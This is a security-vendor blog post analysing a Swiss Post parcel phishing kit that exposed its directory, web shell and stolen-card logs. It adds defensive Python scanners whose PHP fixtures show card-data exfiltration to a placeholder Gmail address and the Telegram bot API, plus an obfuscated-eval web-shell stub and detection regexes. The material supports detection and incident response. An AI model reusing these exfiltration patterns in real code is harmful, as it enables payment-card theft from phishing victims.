Inside a parcel delivery phishing scam: a peek behind the curtain
You're probably familiar with parcel delivery phishing emails—they’re a common tactic and rank just behind financial services as one of the most frequently targeted sectors. Chances are, you've even encountered one yourself.
But have you ever wondered what a phishing website looks like from the attacker’s perspective? Let’s dive into a recent example that reveals more than the scammers likely intended.

About the scam
On April 26th, a member of our threat research team was on his way to the RSA Conference when he received an email notification from (supposedly) the Swiss Post. The message was sent through a hijacked email service account, passing SPF checks. The email itself, while not perfect, could still appear convincing at first glance. For example, it included a logical error where the deadline to pay a fee was later than the stated delivery date, and the fee itself was suspiciously low. But these small inconsistencies are often overlooked by hurried users.
Screenshot of the phishing lure received on 26.4.2025, impersonating the Swiss Post parcel service (logo removed by author)
The links in the phishing email used a redirector hosted at https://email.notify.thinkific.com, which then forwarded users to a compromised website hosting the phishing content. After a series of local redirects, the final landing page prompted users to enter their credit card details to pay the alleged delivery fee. In some cases, the phishing kit was even configured to request the victim’s 2FA SMS code, simulating a real-time interaction.
Screenshot of the phishing site, accessed on 26.4.2025
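The lure described above combines several signals that a mail filter can score independently of SPF: a display name that claims a brand the sender domain does not belong to, links routed through a third-party redirector, a payment deadline later than the delivery date, and an implausibly low fee. The following is an added example of such heuristics written for this post; it is not xorlab's detection code. The email fields are constructed, `swisspost-brand.example` stands in for the brand's real domains (which the post does not list), the only redirector host is the one named above, and the fee threshold is an assumed parameter.

```python
"""Heuristic scoring of a parcel-delivery phishing lure (added example)."""
import re
from dataclasses import dataclass
from datetime import date
from urllib.parse import urlparse


@dataclass
class Lure:
    from_name: str       # display name shown to the user
    from_addr: str       # envelope/header sender address
    spf_result: str      # "pass", "fail" or "none", as reported by the receiving MTA
    html: str            # message body
    delivery_date: date  # delivery date stated in the message
    pay_deadline: date   # deadline given for paying the "fee"
    fee: float           # fee amount stated in the message


# Domains the brand itself sends from and links to. Placeholder values: the
# post does not list Swiss Post's real domains, so this is an assumption.
BRAND_DOMAINS = {"swiss post": {"swisspost-brand.example"}}

# Third-party services seen fronting phishing links. This is the redirector
# host from the post; a production list would be far longer.
REDIRECTOR_HOSTS = {"email.notify.thinkific.com"}

LINK_RE = re.compile(r'href=["\'](https?://[^"\']+)["\']', re.IGNORECASE)


def link_hosts(html: str) -> list[str]:
    """Return the distinct hostnames of all http(s) links in the body."""
    hosts = set()
    for url in LINK_RE.findall(html):
        host = urlparse(url).hostname
        if host:
            hosts.add(host.lower())
    return sorted(hosts)


def analyze(lure: Lure, min_plausible_fee: float = 1.0) -> list[str]:
    """Return a list of human-readable findings; an empty list means no signal."""
    findings = []
    brand = next((b for b in BRAND_DOMAINS if b in lure.from_name.lower()), None)
    sender_domain = lure.from_addr.rsplit("@", 1)[-1].lower()

    # Brand impersonation: the display name claims a brand, the sender domain does not.
    if brand and sender_domain not in BRAND_DOMAINS[brand]:
        findings.append(f"display name claims '{brand}' but sender domain is {sender_domain}")
        if lure.spf_result == "pass":
            # A hijacked sending service passes SPF for its own domain; that says
            # nothing about whether the claimed brand sent the message.
            findings.append("SPF pass only vouches for the sending service, not for the brand")

    # Link analysis: redirectors and off-brand hosts.
    for host in link_hosts(lure.html):
        if host in REDIRECTOR_HOSTS:
            findings.append(f"link goes through known redirector {host}")
        elif brand and host not in BRAND_DOMAINS[brand]:
            findings.append(f"link host {host} does not belong to {brand}")

    # Content logic: the fee deadline cannot sensibly be after delivery.
    if lure.pay_deadline > lure.delivery_date:
        findings.append("payment deadline is after the promised delivery date")

    # Threshold is an assumption; tune it per brand and currency.
    if lure.fee < min_plausible_fee:
        findings.append(f"fee {lure.fee:.2f} is implausibly low for a delivery charge")
    return findings


# Constructed sample mirroring the lure in the post (values are made up).
SAMPLE_LURE = Lure(
    from_name="Swiss Post",
    from_addr="notify@hijacked-sender.example",
    spf_result="pass",
    html='<p>Your parcel is on hold. <a href="https://email.notify.thinkific.com/r/PLACEHOLDER-ID">Pay fee</a></p>',
    delivery_date=date(2025, 4, 28),
    pay_deadline=date(2025, 4, 30),
    fee=0.99,
)

# Constructed legitimate-looking counterpart for comparison.
CLEAN_LURE = Lure(
    from_name="Swiss Post",
    from_addr="noreply@swisspost-brand.example",
    spf_result="pass",
    html='<a href="https://swisspost-brand.example/track">Track your parcel</a>',
    delivery_date=date(2025, 4, 28),
    pay_deadline=date(2025, 4, 27),
    fee=12.50,
)

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LURE):
        print("-", finding)
```

Each finding is a weak signal on its own; the point of the example is that the combination, not SPF, separates the sample lure (five findings) from the clean counterpart (none).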
Sloppy execution lets us see behind the curtain
So far, this is all standard—unfortunately, we see phishing kits like this every day. However, this one had a notable misstep: the attackers left the web directory listing exposed. These kinds of operational security (OpSec) failures are still surprisingly common and give researchers valuable insight into how such campaigns are run.
By accessing the open directory, we were able to view not just the phishing kit and its source code, but also log files with the recorded interactions of the victims. This transparency allowed us to reconstruct the attacker’s timeline. In this specific case, the phishing email was sent within 24 hours of the kit being deployed to the server. We have seen some groups send the email less than one hour after the first compromise.
Interestingly, the language and structure of the phishing page suggest it wasn’t created using generative AI. The HTML and PHP script still had room for optimization and lacked the characteristic comments or style we often see in AI-generated content.
In short, while the phishing lure was typical in many ways, the sloppy execution provided a look behind the scenes—reminding us that even cybercriminals make mistakes.
Screenshot of the web directory listing accidentally exposed by the scammers, accessed on 26.4.2025
Furthermore, the attackers had deployed C99, a well-known web shell that has been around for over 15 years. This tool allows attackers to maintain control over a compromised web server, enabling them to upload additional files or modify existing content as needed.
The phishing site itself was built using simple HTML and PHP files, likely scraped or cloned from legitimate websites to mimic a real parcel service. Victim data was exfiltrated through multiple channels: it was logged locally to a file, emailed to a Gmail address, and posted to a private Telegram channel. This kind of multi-channel exfiltration increases the attacker’s chances of capturing data even if one method fails—yet ironically, it also exposes the data to anyone who stumbles upon the open directory.
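When a site owner or responder gets access to a compromised web root like this one, the first task is to find the kit's handler and any web shell among the legitimate files. The following is an added example of a coarse source scanner written for this post, not xorlab's tooling: it looks for the three exfiltration channels named above (local log file, PHP `mail()`, Telegram bot API), card and OTP form fields, and generic web-shell markers (`eval(base64_decode(...))` and a `c99` string). The PHP snippets are constructed stand-ins with placeholder tokens and addresses; the indicator regexes are my own generalisation, so expect false positives on legitimate code that sends mail or writes files.

```python
"""Scan PHP sources for phishing-kit exfiltration and web-shell indicators (added example)."""
import os
import re

# Indicator name -> regex. Coarse by design; treat hits as leads, not verdicts.
INDICATORS = {
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot", re.IGNORECASE),
    "php_mail": re.compile(r"\bmail\s*\(", re.IGNORECASE),
    "local_log_write": re.compile(r"\b(file_put_contents|fwrite|fopen)\s*\(", re.IGNORECASE),
    "card_fields": re.compile(
        r"\$_(POST|REQUEST)\[\s*['\"](cc|card|cvv|cvc|pan|exp)\w*['\"]\s*\]", re.IGNORECASE),
    "otp_fields": re.compile(
        r"\$_(POST|REQUEST)\[\s*['\"](otp|sms|code)\w*['\"]\s*\]", re.IGNORECASE),
    "obfuscated_eval": re.compile(
        r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.IGNORECASE),
    "c99_marker": re.compile(r"c99", re.IGNORECASE),  # crude marker for the C99 shell family
}
EXFIL_CHANNELS = {"telegram_bot_api", "php_mail", "local_log_write"}
SHELL_MARKERS = {"obfuscated_eval", "c99_marker"}


def scan_source(text: str) -> list[str]:
    """Return the sorted indicator names that match the given source text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def classify(hits) -> str:
    """Turn a set of indicator hits into a triage label."""
    hits = set(hits)
    if hits & SHELL_MARKERS:
        return "web-shell"
    if "card_fields" in hits and hits & EXFIL_CHANNELS:
        return "phishing-kit handler"
    if "card_fields" in hits or "otp_fields" in hits or hits & EXFIL_CHANNELS:
        return "suspicious"
    return "clean"


def scan_sources(sources: dict) -> dict:
    """Map each filename to (hits, label) for an in-memory {name: text} dict."""
    results = {}
    for name, text in sources.items():
        hits = scan_source(text)
        results[name] = (hits, classify(hits))
    return results


def scan_tree(root: str, exts=(".php", ".phtml", ".inc")) -> dict:
    """Walk a directory (for example a copied web root) and scan every PHP file."""
    sources = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(exts):
                path = os.path.join(dirpath, fname)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    sources[path] = fh.read()
    return scan_sources(sources)


# Constructed samples; tokens, chat ids and addresses are placeholders.
SAMPLES = {
    "post.php": r"""<?php
$card = $_POST['cc_number']; $cvv = $_POST['cvv']; $exp = $_POST['exp'];
$line = "$card|$exp|$cvv|" . $_SERVER['REMOTE_ADDR'] . "\n";
file_put_contents('log.txt', $line, FILE_APPEND);
mail('COLLECTOR-PLACEHOLDER@gmail.com', 'new', $line);
file_get_contents('https://api.telegram.org/botTOKEN-PLACEHOLDER/sendMessage?chat_id=CHAT-PLACEHOLDER&text=' . urlencode($line));
""",
    "sms.php": r"""<?php $otp = $_POST['sms_code']; file_put_contents('log.txt', "otp=$otp\n", FILE_APPEND);""",
    "shell.php": r"""<?php /* c99shell */ eval(base64_decode('PAYLOAD-PLACEHOLDER'));""",
    "index.php": "<?php include 'header.php'; echo '<h1>Track your parcel</h1>';",
}

if __name__ == "__main__":
    for name, (hits, label) in scan_sources(SAMPLES).items():
        print(f"{name:10} {label:22} {', '.join(hits)}")
```

On a real incident, run `scan_tree()` over a copy of the web root rather than the live server, and prioritise anything labelled `web-shell` or `phishing-kit handler` for removal and for identifying the log files that hold victim data.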
Already hundreds of credit cards stolen
It's reasonable to assume that the campaign had just started when we initiated our investigation. Nevertheless, we already discovered hundreds of customer data records within these log files. Naturally, not all log entries can be deemed reliable. Some might be test submissions from cautious users—or even from the attackers themselves during the setup phase. However, the entries we examined (and reported) seemed credible and aligned with actual victim behavior.
In a similar case in Germany dubbed Dracula, researchers investigated a phishing network operating over a seven-month period from 2023 to 2024. Log data revealed that approximately 13 million users clicked on the malicious link, and at least 884,000 submitted what appeared to be valid credit card information. That translates to a troubling 7% success rate for the cybercriminals.
A snapshot of the log file containing phished credit card details
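Before reporting records from a log like this one, a responder has to separate credible entries from noise: test submissions, malformed numbers, duplicates from repeated form posts, and expired cards. The following is an added example of that triage written for this post; it is not xorlab's process. The log format and every record are constructed (the card numbers are Luhn-valid synthetic values or publicly documented test numbers, and the IPs are documentation ranges); the real log layout is not shown in the post.

```python
"""Triage of a phishing kit's victim log before reporting (added example)."""
import re
from datetime import date

# Publicly documented payment-processor test numbers; submissions using these
# are almost certainly tests, not victims.
TEST_PANS = {"4111111111111111", "5555555555554444", "378282246310005"}


def luhn_ok(pan: str) -> bool:
    """Luhn check plus a length sanity bound; rejects obviously malformed entries."""
    if not pan.isdigit() or not 12 <= len(pan) <= 19:
        return False
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def expiry_ok(exp: str, as_of: date) -> bool:
    """True if an MM/YY expiry is well-formed and not in the past relative to as_of."""
    m = re.fullmatch(r"(\d{2})/(\d{2})", exp)
    if not m:
        return False
    month, year = int(m.group(1)), 2000 + int(m.group(2))
    return 1 <= month <= 12 and (year, month) >= (as_of.year, as_of.month)


def mask_pan(pan: str) -> str:
    """Keep BIN and last four, which is what issuers need and all a report should carry."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def triage(log_text: str, as_of: date) -> dict:
    """Classify each log line; only credible, de-duplicated records are kept (masked)."""
    result = {"total": 0, "invalid": 0, "test_number": 0, "stale": 0,
              "duplicate": 0, "credible": []}
    seen = set()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        result["total"] += 1
        ts, ip, pan, exp, _cvv = line.split("|")   # constructed layout: ts|ip|pan|exp|cvv
        pan = re.sub(r"\D", "", pan)
        if not luhn_ok(pan):
            result["invalid"] += 1
        elif pan in TEST_PANS:
            result["test_number"] += 1
        elif not expiry_ok(exp, as_of):
            result["stale"] += 1
        elif pan in seen:
            result["duplicate"] += 1
        else:
            seen.add(pan)
            result["credible"].append({"ts": ts, "ip": ip, "pan": mask_pan(pan), "bin": pan[:6]})
    return result


def issuer_bins(triaged: dict) -> list[str]:
    """Distinct BINs of credible records, for notifying the issuing banks."""
    return sorted({r["bin"] for r in triaged["credible"]})


# Constructed sample log: one genuine-looking record posted twice, one test
# number, one Luhn failure, one second genuine-looking record, one garbage
# entry and one expired card.
SAMPLE_LOG = """\
2025-04-26 08:02:11|203.0.113.7|4532015112830366|12/27|123
2025-04-26 08:02:40|203.0.113.7|4532015112830366|12/27|123
2025-04-26 08:05:02|198.51.100.9|4111111111111111|01/30|000
2025-04-26 08:09:55|192.0.2.44|4532015112830367|05/28|884
2025-04-26 08:10:13|192.0.2.45|5425233430109903|09/26|417
2025-04-26 08:11:00|192.0.2.46|1234|11/29|111
2025-04-26 08:12:30|192.0.2.47|5425233430109911|03/24|417
"""

if __name__ == "__main__":
    summary = triage(SAMPLE_LOG, as_of=date(2025, 4, 26))
    print({k: v for k, v in summary.items() if k != "credible"})
    for rec in summary["credible"]:
        print(rec)
    print("BINs to notify:", issuer_bins(summary))
```

Of the seven constructed lines only two survive as credible, which is the kind of reduction to expect before a log's raw line count is quoted as a victim count; the masked output is also all that should leave the responder's machine.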
Unlike other phishing kits such as Red Country, which often include sophisticated filtering to block known security researchers and crawlers by IP address or user agent, this kit applied no such restrictions.
We promptly reported all indicators of compromise (IoCs) to the relevant authorities, and the malicious content has since been taken down. Customers of xorlab were protected from this phishing attempt right from the start, thanks to our proactive detection capabilities.
Conclusion
This incident highlights both the persistence and the sloppiness of modern phishing operations. While attackers continue to refine their social engineering tactics, their infrastructure often contains glaring weaknesses—like open directories and unfiltered access—that defenders can leverage for investigation and takedown. On the other hand, they are still successful in compromising user data, even with these simple methods.
It also underscores the importance of layered defenses: robust email filtering, behavioral analysis, and proactive threat intelligence all play a role in stopping threats before they reach end users. At xorlab, we continue to monitor, analyze, and disrupt phishing campaigns like this one—keeping our customers a step ahead of attackers.
Stay vigilant, and remember: even a simple-looking email can lead to a deeper, more revealing story behind the scenes.